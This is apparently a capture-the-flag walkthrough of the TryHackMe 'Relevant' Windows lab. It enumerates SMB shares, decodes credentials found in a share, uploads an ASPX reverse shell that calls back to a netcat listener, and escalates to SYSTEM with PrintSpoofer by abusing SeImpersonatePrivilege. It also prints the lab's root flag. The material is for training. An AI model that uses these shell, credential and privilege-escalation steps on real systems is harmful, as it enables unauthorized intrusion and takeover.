Some Machines are exploitable instantly but some might require exploiting other ones first. Enumerate every compromised machine to identify valuable information, that will help you proceed further into the environment.
If you are stuck on one of the machines, don't overthink and start pentesting another one.
When you read the flag file, you can be sure that the machine was successfully compromised. But keep your eyes open - apart from the flag, other useful information may be present on the system.
Pre-Engagement Briefing
You have been assigned to a client that wants a penetration test
conducted on an environment due to be released to production in seven days.
Scope of Work
The client requests that an engineer conducts an assessment of the
provided virtual environment. The client has asked that minimal information be
provided about the assessment, wanting the engagement conducted from the eyes
of a malicious actor (black box penetration test). The client has asked
that you secure two flags (no location provided) as proof of exploitation:
User.txt
Root.txt
Additionally, the client has provided the following scope allowances:
# Any tools or techniques are permitted in this engagement,
however we ask that # you attempt manual exploitation first
#
Locate and note all vulnerabilities found
# Submit the flags
discovered to the dashboard
# Only the IP address assigned to your
machine is in scope
# Find and report ALL vulnerabilities (yes,
there is more than one path to root)
Penetration Testing Methodology
Reconnaissance
# Nmap
Enumeration
# Smbclient
# Smbmap
Exploiting
# Abuse of write permission in Samba service
Privilege
Escalation
# Permission in SeImpersonatePrivilege in the
system.
Lets Start, first of all we will Reconnaissance this machine (our target ip may be differ from you ), lets scan first with nmap..
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ sudo nmap -sC -sV 10.10.220.229 130 ⨯ Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 11:22 IST Nmap scan report for 10.10.220.229 Host is up (0.35s latency). Not shown: 995 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: IIS Windows Server 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2022-03-17T05:53:59+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=Relevant | Not valid before: 2022-03-16T05:13:22 |_Not valid after: 2022-09-15T05:13:22 | rdp-ntlm-info: | Target_Name: RELEVANT | NetBIOS_Domain_Name: RELEVANT | NetBIOS_Computer_Name: RELEVANT | DNS_Domain_Name: Relevant | DNS_Computer_Name: Relevant | Product_Version: 10.0.14393 |_ System_Time: 2022-03-17T05:53:20+00:00 Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 1h24m00s, deviation: 3h07m51s, median: 0s | smb2-time: | date: 2022-03-17T05:53:20 |_ start_date: 2022-03-17T05:14:03 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required | smb-os-discovery: | OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3) | Computer name: Relevant | NetBIOS computer name: RELEVANT\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2022-03-16T22:53:20-07:00 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 74.72 seconds ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$
Then we will enumerating with enum4linux but unfortunately we get nothing from it..but we will keep trying.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ enum4linux 10.10.220.229 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Mar 17 10:47:18 2022 ========================== | Target Information | ========================== Target ........... 10.10.220.229 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ===================================================== | Enumerating Workgroup/Domain on 10.10.220.229 | ===================================================== [E] Can't find workgroup/domain ============================================= | Nbtstat Information for 10.10.220.229 | ============================================= Looking up status of 10.10.220.229 No reply from 10.10.220.229 ====================================== | Session Check on 10.10.220.229 | ====================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437. [E] Server doesn't allow session using username '', password ''. Aborting remainder of tests. ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ 1 ⨯
you can also enumerate with nmap samba enumeration
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ nmap -p 139,445 -Pn --script smb-enum* 10.10.220.229 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 12:31 IST Nmap scan report for 10.10.220.229 Host is up (0.35s latency). PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds Host script results: | smb-enum-shares: | account_used: guest | \\10.10.220.229\ADMIN$: | Type: STYPE_DISKTREE_HIDDEN | Comment: Remote Admin | Anonymous access: <none> | Current user access: <none> | \\10.10.220.229\C$: | Type: STYPE_DISKTREE_HIDDEN | Comment: Default share | Anonymous access: <none> | Current user access: <none> | \\10.10.220.229\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: Remote IPC | Anonymous access: <none> | Current user access: READ/WRITE | \\10.10.220.229\nt4wrksv: | Type: STYPE_DISKTREE | Comment: | Anonymous access: <none> |_ Current user access: READ/WRITE | smb-enum-sessions: |_ <nobody> Nmap done: 1 IP address (1 host up) scanned in 97.83 seconds ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$
Also read-
Click Here
We are visiting the web service (port 80), we check the source code and robots.txt, it seems that there is nothing useful.
Network share
Let’s start with the network share. Listing the shares reveals the
presence of nt4wrksv.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ smbclient -L //10.10.220.229 Enter WORKGROUP\kali's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC nt4wrksv Disk SMB1 disabled -- no workgroup available ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$
Connecting to this share reveals a password file:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ sudo smbclient //10.10.220.229/nt4wrksv Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Sun Jul 26 03:16:04 2020 .. D 0 Sun Jul 26 03:16:04 2020 passwords.txt A 98 Sat Jul 25 20:45:33 2020 7735807 blocks of size 4096. 4922488 blocks available smb: \> get passwords.txt getting file \passwords.txt of size 98 as passwords.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec) smb: \> #www.hackingtruth.org
The file contains base64 encoded credentials, We decode the file and we found
credentials.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ ls content.txt passwords.txt ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ cat passwords.txt [User Passwords - Encoded] Qm9iIC0gIVBAJCRXMHJEITEyMw== QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$
For decoding this one, you can use many types of method like online, offline, via terminal, etc. But we will hURL tool. So, first install it and then you can use it.
Also read-
Click Here
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ sudo apt-get install hurl Reading package lists... Done Building dependency tree... Done Reading state information... Done The following packages were automatically installed and are no longer required: libblkid-dev libglib2.0-dev-bin libmount-dev libpcre16-3 libpcre2-dev libpcre2-posix3 libpcre3-dev libpcre32-3 libpcrecpp0v5 libselinux1-dev libsepol-dev mypaint-brushes mypaint-data mypaint-data-extras uuid-dev Use 'sudo apt autoremove' to remove them. The following NEW packages will be installed: hurl 0 upgraded, 1 newly installed, 0 to remove and 903 not upgraded. Need to get 19.5 kB of archives. After this operation, 191 kB of additional disk space will be used. Get:1 http://ftp.harukasan.org/kali kali-rolling/main amd64 hurl all 2.1-0kali2 [19.5 kB] Fetched 19.5 kB in 14s (1,432 B/s) Selecting previously unselected package hurl. (Reading database ... 431755 files and directories currently installed.) Preparing to unpack .../hurl_2.1-0kali2_all.deb ... Unpacking hurl (2.1-0kali2) ... Setting up hurl (2.1-0kali2) ... Processing triggers for kali-menu (2021.4.2) ... ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ hURL -b "Qm9iIC0gIVBAJCRXMHJEITEyMw==" Original string :: Qm9iIC0gIVBAJCRXMHJEITEyMw== base64 DEcoded string :: Bob - !P@$$W0rD!123 ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ hURL -b "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" Original string :: QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk base64 DEcoded string :: Bill - Juw4nnaM4n420696969!$$$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d Bob - !P@$$W0rD!123 ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ #www.kumaratuljaiswal.in #www.hackingtruth.in ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d Bill - Juw4nnaM4n420696969!$$$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d;echo"" Bill - Juw4nnaM4n420696969!$$$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d;echo"" Bob - !P@$$W0rD!123 ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$
Is an hour of use of smbmap with credentials found. We view can writing in share “nt4wrksv“.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ smbmap -H 10.10.220.229 -u bob -p '!P@$$W0rD!123' [+] IP: 10.10.220.229:445 Name: 10.10.220.229 Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ READ ONLY Remote IPC nt4wrksv READ, WRITE ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$
Also read-
We are testing access the directory in different webservice, we enumerate of the correct SAMBA webservice in
running port 49663.
Exploiting
We upload a “shell.aspx“, this is a webshell for execute commands from browser.
Click Here for Shell...
But first download shell.aspx
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ sudo wget https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx [sudo] password for hackerboy: --2022-03-18 12:33:57-- https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 2606:50c0:8003::154, 2606:50c0:8000::154, 2606:50c0:8001::154, ... Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8003::154|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 15968 (16K) [text/plain] Saving to: ‘shell.aspx’ shell.aspx 100%[====================================================================================================>] 15.59K --.-KB/s in 0.002s 2022-03-18 12:34:04 (9.54 MB/s) - ‘shell.aspx.1’ saved [15968/15968] ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$
After downloading this shell.aspx, change this IP and port number with your (Attacker) machine IP address.
Now we can upload this shell in samba network via this command:
sudo smbclient //10.10.177.40/nt4wrksv -u bob -p┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ sudo smbclient //10.10.177.40/nt4wrksv -u bob -p Try "help" to get a list of possible commands. smb: \> dir . D 0 Sun Jul 26 03:16:04 2020 .. D 0 Sun Jul 26 03:16:04 2020 passwords.txt A 98 Sat Jul 25 20:45:33 2020 7735807 blocks of size 4096. 4951344 blocks available smb: \> put shell.aspx putting file shell.aspx as \shell.aspx (1.1 kb/s) (average 1.1 kb/s) smb: \>
then we will run this url on browser and get a reverse shell via this command:
10.10.162.140:49663/nt4wrksv/shell.aspx (this IP is belong to
vulnerable machine)
then run this command in our terminal
nc -nvlp 4444
after connecting reverse shell with your system then we will find user flag, so i searched it in every directory/file and finally i found this...so, i recommend you first find it yourself.
User-flag
Privilege Escalation (NT AUTHORITY\SYSTEM) (Root Flag)
We execute of command “whoami /priv” and we see that we have permission in privilege “SeImpersonatePrivilege” of the system.
c:\Users\Bob\Desktop>whoami /priv whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeAuditPrivilege Generate security audits Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled c:\Users\Bob\Desktop>
I started to Google the abuse of this privilege in Windows 2016, I found this github that worked for me (after several xD attempts).
PrintSpoofer
To exploit this impersonation privilege, the standard potato exploit
won’t work, and we’ll use a new tool called PrintSpoofer.
First we will download a PrintSpoofer.exe file for get a administrator power in windows...
Then we will put PrintSpoofer in samba network..
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant] └─$ sudo smbclient //10.10.177.40/nt4wrksv -u bob -p Try "help" to get a list of possible commands. smb: \> dir . D 0 Sun Jul 26 03:16:04 2020 .. D 0 Sun Jul 26 03:16:04 2020 passwords.txt A 98 Sat Jul 25 20:45:33 2020 7735807 blocks of size 4096. 4951344 blocks available smb: \> smb: \> put PrintSpoofer.exe putting file PrintSpoofer.exe as \PrintSpoofer.exe (8.7 kb/s) (average 7.1 kb/s) smb: \> smb: \> dir . D 0 Fri Mar 18 12:52:00 2022 .. D 0 Fri Mar 18 12:52:00 2022 passwords.txt A 98 Sat Jul 25 20:45:33 2020 PrintSpoofer.exe A 27136 Fri Mar 18 12:52:02 2022 shell.aspx A 15990 Fri Mar 18 12:38:30 2022 7735807 blocks of size 4096. 4946925 blocks available smb: \>
c:\inetpub\wwwroot\nt4wrksv>dir dir Volume in drive C has no label. Volume Serial Number is AC3C-5CB5 Directory of c:\inetpub\wwwroot\nt4wrksv 03/18/2022 12:22 AM <DIR> . 03/18/2022 12:22 AM <DIR> .. 07/25/2020 08:15 AM 98 passwords.txt 03/18/2022 12:22 AM 27,136 PrintSpoofer.exe 03/18/2022 12:08 AM 15,990 shell.aspx 3 File(s) 43,224 bytes 2 Dir(s) 20,228,485,120 bytes free c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer -i -c cmd PrintSpoofer -i -c cmd [+] Found privilege: SeImpersonatePrivilege [+] Named pipe listening... [+] CreateProcessAsUser() OK Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Windows\system32>
Now, let’s elevate our privileges with printspoofer:
Root Flag
C:\Windows\system32>cd / cd / C:\>dir dir Volume in drive C has no label. Volume Serial Number is AC3C-5CB5 Directory of C:\ 07/25/2020 08:16 AM <DIR> inetpub 07/25/2020 08:42 AM <DIR> Microsoft 07/16/2016 06:23 AM <DIR> PerfLogs 07/25/2020 08:00 AM <DIR> Program Files 07/25/2020 04:15 PM <DIR> Program Files (x86) 07/25/2020 02:03 PM <DIR> Users 07/25/2020 04:16 PM <DIR> Windows 0 File(s) 0 bytes 7 Dir(s) 20,228,354,048 bytes free C:\>cd Users cd Users C:\Users>dir dir Volume in drive C has no label. Volume Serial Number is AC3C-5CB5 Directory of C:\Users 07/25/2020 02:03 PM <DIR> . 07/25/2020 02:03 PM <DIR> .. 07/25/2020 08:05 AM <DIR> .NET v4.5 07/25/2020 08:05 AM <DIR> .NET v4.5 Classic 07/25/2020 10:30 AM <DIR> Administrator 07/25/2020 02:03 PM <DIR> Bob 07/25/2020 07:58 AM <DIR> Public 0 File(s) 0 bytes 7 Dir(s) 20,228,354,048 bytes free C:\Users>cd Administrator cd Administrator C:\Users\Administrator>dir dir Volume in drive C has no label. Volume Serial Number is AC3C-5CB5 Directory of C:\Users\Administrator 07/25/2020 10:30 AM <DIR> . 07/25/2020 10:30 AM <DIR> .. 07/25/2020 07:58 AM <DIR> Contacts 07/25/2020 08:24 AM <DIR> Desktop 07/25/2020 07:58 AM <DIR> Documents 07/25/2020 08:39 AM <DIR> Downloads 07/25/2020 07:58 AM <DIR> Favorites 07/25/2020 07:58 AM <DIR> Links 07/25/2020 07:58 AM <DIR> Music 07/25/2020 07:58 AM <DIR> Pictures 07/25/2020 07:58 AM <DIR> Saved Games 07/25/2020 07:58 AM <DIR> Searches 07/25/2020 07:58 AM <DIR> Videos 0 File(s) 0 bytes 13 Dir(s) 20,226,048,000 bytes free C:\Users\Administrator>cd Desktop cd Desktop C:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is AC3C-5CB5 Directory of C:\Users\Administrator\Desktop 07/25/2020 08:24 AM <DIR> . 07/25/2020 08:24 AM <DIR> .. 07/25/2020 08:25 AM 35 root.txt 1 File(s) 35 bytes 2 Dir(s) 20,224,438,272 bytes free C:\Users\Administrator\Desktop>type root.txt type root.txt THM{1fk5kf469devly1gl320zafgl345pv} C:\Users\Administrator\Desktop> C:\Users\Administrator\Desktop>hackingtruth.org
Congratulations we got it :-)